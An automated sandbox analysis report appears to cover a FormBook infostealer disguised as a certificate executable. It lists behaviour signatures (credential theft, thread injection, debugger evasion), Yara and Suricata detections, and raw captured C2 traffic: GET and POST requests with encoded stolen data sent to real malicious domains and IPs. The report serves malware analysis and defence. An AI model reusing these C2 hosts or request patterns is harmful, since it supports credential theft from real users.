Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Certificate 11-19AIS.exe

Overview

General Information

Sample name:Certificate 11-19AIS.exe
Analysis ID:1562318
MD5:1e1db5d9c073fcff1706c32d887e3e28
SHA1:76cd9d1e4b8817fccba215ecdf8916a8e9bcbe8b
SHA256:4de8d7a95ca5edd2a521f7232b56b02d2f684f1638a2a704270631c127ba9c02
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Certificate 11-19AIS.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\Certificate 11-19AIS.exe" MD5: 1E1DB5D9C073FCFF1706C32D887E3E28)
    • svchost.exe (PID: 7940 cmdline: "C:\Users\user\Desktop\Certificate 11-19AIS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • auecFLppjswMvwfJiAu.exe (PID: 5940 cmdline: "C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • auecFLppjswMvwfJiAu.exe (PID: 3796 cmdline: "C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x337a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1ce3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-19AIS.exe, ParentProcessId: 7852, ParentProcessName: Certificate 11-19AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ProcessId: 7940, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-19AIS.exe, ParentProcessId: 7852, ParentProcessName: Certificate 11-19AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ProcessId: 7940, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T13:57:30.494965+010020507451Malware Command and Control Activity Detected192.168.2.1149764154.215.72.11080TCP
            2024-11-25T13:58:04.614278+010020507451Malware Command and Control Activity Detected192.168.2.1149844116.50.37.24480TCP
            2024-11-25T13:59:28.291434+010020507451Malware Command and Control Activity Detected192.168.2.114989985.159.66.9380TCP
            2024-11-25T13:59:43.521796+010020507451Malware Command and Control Activity Detected192.168.2.114998791.195.240.9480TCP
            2024-11-25T14:00:07.086273+010020507451Malware Command and Control Activity Detected192.168.2.114999166.29.149.4680TCP
            2024-11-25T14:00:22.539513+010020507451Malware Command and Control Activity Detected192.168.2.1149995195.110.124.13380TCP
            2024-11-25T14:00:54.382040+010020507451Malware Command and Control Activity Detected192.168.2.1149999217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4QAvira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Certificate 11-19AIS.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Certificate 11-19AIS.exeJoe Sandbox ML: detected
            Source: Certificate 11-19AIS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382456164.00000000003FE000.00000002.00000001.01000000.00000004.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000000.1529575482.00000000003FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007F6CA9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_007F60DD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_007F63F9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007FEB60
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FF56F FindFirstFileW,FindClose,0_2_007FF56F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007FF5FA
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00801B2F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00801C8A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00801F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0282BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02819480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0281DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_02E0053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49764 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49844 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49987 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49991 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49995 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49899 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49999 -> 217.196.55.202:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00804EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00804EB5
            Source: global trafficHTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?zh=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&HpnH2=lZrlsdK8B4Q HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 7a 68 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 7a 4e 6b 71 64 71 73 48 6e 59 57 6a 72 30 4f 47 34 69 4f 6a 54 77 41 52 5a 5a 4d 4e 6d 50 57 67 3d 3d Data Ascii: zh=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
